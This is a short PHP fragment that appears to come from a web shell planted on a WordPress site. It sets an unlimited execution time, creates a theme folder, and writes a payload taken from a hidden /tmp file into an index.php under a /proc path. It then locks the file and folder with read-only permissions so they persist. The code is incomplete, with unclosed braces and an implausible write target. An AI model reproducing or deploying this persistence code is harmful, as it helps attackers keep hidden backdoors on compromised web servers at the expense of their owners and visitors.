@ini_set("max_execution_time", 0);
if (!file_exists("/var/www/biogenelab.eu/public_html/wp-content/themes/twentysixteen")){
mkdir("/var/www/biogenelab.eu/public_html/wp-content/themes/twentysixteen");
if (!file_exists("/proc/26297/attr/index.php")){
$text = base64_encode(file_get_contents("/tmp/.sessions/.L3Byb2MvMjYyOTcvYXR0cmluZGV4LXRleHQ="));
file_put_contents("/proc/26297/attr/index.php", base64_decode($text));
if (gecko_perm("/proc/26297/attr/index.php") != 0444){
chmod("/proc/26297/attr/index.php", 0444);
if (gecko_perm("/var/www/biogenelab.eu/public_html/wp-content/themes/twentysixteen") != 0555){
chmod("/var/www/biogenelab.eu/public_html/wp-content/themes/twentysixteen", 0555);
function gecko_perm($flename){
return substr(sprintf("%o", fileperms($flename)), -4);